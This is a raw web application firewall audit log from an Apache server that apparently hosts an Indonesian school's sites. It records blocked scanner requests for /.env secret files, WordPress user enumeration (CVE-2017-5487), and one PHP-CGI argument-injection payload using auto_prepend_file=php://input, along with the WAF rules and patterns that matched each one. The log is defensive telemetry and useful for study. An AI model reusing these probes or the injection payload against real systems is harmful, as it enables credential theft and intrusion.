Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3530665e-Z-- --c9813818-A-- [08/Jun/2025:20:09:22 +0700] aEWLgsCyjFxjzV1Pwa037QAAABg 103.236.140.4 60256 103.236.140.4 8181 --c9813818-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 196.251.67.143 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 196.251.67.143 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --c9813818-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9813818-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749388162741012 919 (- - -) Stopwatch2: 1749388162741012 919; combined=344, p1=301, p2=0, p3=0, p4=0, p5=42, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9813818-Z-- --11cc552f-A-- [08/Jun/2025:20:16:14 +0700] aEWNHse0OZpePEzoRnpVqQAAAEE 103.236.140.4 60372 103.236.140.4 8181 --11cc552f-B-- GET /dashboard/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-A730F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 Accept-Charset: utf-8 --11cc552f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11cc552f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749388574050499 839 (- - -) Stopwatch2: 1749388574050499 839; combined=337, p1=296, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11cc552f-Z-- --5f1b0531-A-- [08/Jun/2025:20:37:48 +0700] aEWSLMe0OZpePEzoRnpWUAAAAEw 103.236.140.4 35516 103.236.140.4 8181 --5f1b0531-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.235.64.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.235.64.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5f1b0531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f1b0531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749389868033087 3010 (- - -) Stopwatch2: 1749389868033087 3010; combined=1320, p1=436, p2=853, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f1b0531-Z-- --5f1b0531-A-- [08/Jun/2025:20:43:45 +0700] aEWTkcCyjFxjzV1Pwa04vwAAABU 103.236.140.4 35558 103.236.140.4 8181 --5f1b0531-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --5f1b0531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f1b0531-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749390225808514 798 (- - -) Stopwatch2: 1749390225808514 798; combined=325, p1=283, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f1b0531-Z-- --7471012b-A-- [08/Jun/2025:20:53:39 +0700] aEWV48CyjFxjzV1Pwa04wwAAABg 103.236.140.4 35628 103.236.140.4 8181 --7471012b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.153.21.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.153.21.218 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7471012b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7471012b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749390819857292 3179 (- - -) Stopwatch2: 1749390819857292 3179; combined=1349, p1=444, p2=876, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7471012b-Z-- --ee80b756-A-- [08/Jun/2025:21:01:57 +0700] aEWX1YsoVckF-yt1MVzaCAAAAMU 103.236.140.4 35722 103.236.140.4 8181 --ee80b756-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows Phone 8.1; ARM; Trident/7.0; Touch; rv:11.0; IEMobile/11.0; NOKIA; Lumia 630) like Gecko Accept-Charset: utf-8 --ee80b756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee80b756-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749391317841930 747 (- - -) Stopwatch2: 1749391317841930 747; combined=305, p1=267, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee80b756-Z-- --e12fa05e-A-- [08/Jun/2025:21:02:10 +0700] aEWX4osoVckF-yt1MVzaCQAAAMs 103.236.140.4 35724 103.236.140.4 8181 --e12fa05e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Links (2.1pre15; Linux 2.4.26 i686; 158x61) Accept-Charset: utf-8 --e12fa05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e12fa05e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749391330462102 825 (- - -) Stopwatch2: 1749391330462102 825; combined=351, p1=309, p2=0, p3=0, p4=0, p5=41, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e12fa05e-Z-- --2f52ac0c-A-- [08/Jun/2025:21:40:38 +0700] aEWg5qD1_iznf-QmBECXOAAAAI0 103.236.140.4 35900 103.236.140.4 8181 --2f52ac0c-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 198.55.98.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 198.55.98.76 X-Forwarded-Proto: https Connection: close User-Agent: HTMLParser/1.6 Accept-Charset: utf-8 --2f52ac0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f52ac0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749393638803818 846 (- - -) Stopwatch2: 1749393638803818 846; combined=333, p1=288, p2=0, p3=0, p4=0, p5=44, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f52ac0c-Z-- --0be2ff48-A-- [08/Jun/2025:21:57:55 +0700] aEWk88e0OZpePEzoRnpWgQAAAE8 103.236.140.4 35988 103.236.140.4 8181 --0be2ff48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.142.108.14 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.142.108.14 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0be2ff48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0be2ff48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749394675325911 3167 (- - -) Stopwatch2: 1749394675325911 3167; combined=1396, p1=480, p2=883, p3=0, p4=0, p5=33, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0be2ff48-Z-- --60b77558-A-- [08/Jun/2025:22:03:30 +0700] aEWmQse0OZpePEzoRnpWgwAAAEA 103.236.140.4 36006 103.236.140.4 8181 --60b77558-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 125.17.108.32 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 125.17.108.32 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --60b77558-C-- --60b77558-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60b77558-E-- --60b77558-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749395010055887 5199 (- - -) Stopwatch2: 1749395010055887 5199; combined=3597, p1=507, p2=3058, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60b77558-Z-- --ee9d370c-A-- [08/Jun/2025:22:18:31 +0700] aEWpx8CyjFxjzV1Pwa04-AAAABQ 103.236.140.4 36210 103.236.140.4 8181 --ee9d370c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.176.46.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.176.46.28 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ee9d370c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ee9d370c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749395911367921 3100 (- - -) Stopwatch2: 1749395911367921 3100; combined=1361, p1=486, p2=845, p3=0, p4=0, p5=29, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ee9d370c-Z-- --f1d9007f-A-- [08/Jun/2025:22:19:10 +0700] aEWp7osoVckF-yt1MVzaMwAAAMY 103.236.140.4 36216 103.236.140.4 8181 --f1d9007f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.99 Safari/537.36 Accept-Charset: utf-8 --f1d9007f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1d9007f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749395950877164 863 (- - -) Stopwatch2: 1749395950877164 863; combined=393, p1=350, p2=0, p3=0, p4=0, p5=43, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1d9007f-Z-- --bf915914-A-- [08/Jun/2025:22:33:34 +0700] aEWtTsCyjFxjzV1Pwa05CQAAABg 103.236.140.4 36292 103.236.140.4 8181 --bf915914-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 178.128.207.138 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --bf915914-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf915914-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749396814511257 662 (- - -) Stopwatch2: 1749396814511257 662; combined=246, p1=219, p2=0, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf915914-Z-- --9228f95e-A-- [08/Jun/2025:23:10:15 +0700] aEW156D1_iznf-QmBECYfQAAAJc 103.236.140.4 39928 103.236.140.4 8181 --9228f95e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.198 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --9228f95e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9228f95e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749399015291980 2189 (- - -) Stopwatch2: 1749399015291980 2189; combined=1064, p1=344, p2=689, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9228f95e-Z-- --d921f41b-A-- [08/Jun/2025:23:16:49 +0700] aEW3caD1_iznf-QmBECZWgAAAIU 103.236.140.4 43068 103.236.140.4 8181 --d921f41b-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 31.56.56.150 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 31.56.56.150 Accept-Encoding: gzip X-Varnish: 173687059 --d921f41b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d921f41b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749399409728118 764 (- - -) Stopwatch2: 1749399409728118 764; combined=304, p1=270, p2=0, p3=0, p4=0, p5=34, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d921f41b-Z-- --1d91e060-A-- [08/Jun/2025:23:45:47 +0700] aEW-O4soVckF-yt1MVzbkwAAAMU 103.236.140.4 43376 103.236.140.4 8181 --1d91e060-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --1d91e060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1d91e060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401147564864 894 (- - -) Stopwatch2: 1749401147564864 894; combined=343, p1=309, p2=0, p3=0, p4=0, p5=33, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1d91e060-Z-- --9223567d-A-- [08/Jun/2025:23:45:47 +0700] aEW-O8CyjFxjzV1Pwa07VgAAAAY 103.236.140.4 43380 103.236.140.4 8181 --9223567d-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9223567d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9223567d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401147645507 666 (- - -) Stopwatch2: 1749401147645507 666; combined=256, p1=228, p2=0, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9223567d-Z-- --d5e02b43-A-- [08/Jun/2025:23:45:47 +0700] aEW-O8CyjFxjzV1Pwa07WAAAAAk 103.236.140.4 43384 103.236.140.4 8181 --d5e02b43-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.253.27.40 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.253.27.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --d5e02b43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5e02b43-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749401147967012 732 (- - -) Stopwatch2: 1749401147967012 732; combined=293, p1=264, p2=0, p3=0, p4=0, p5=29, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
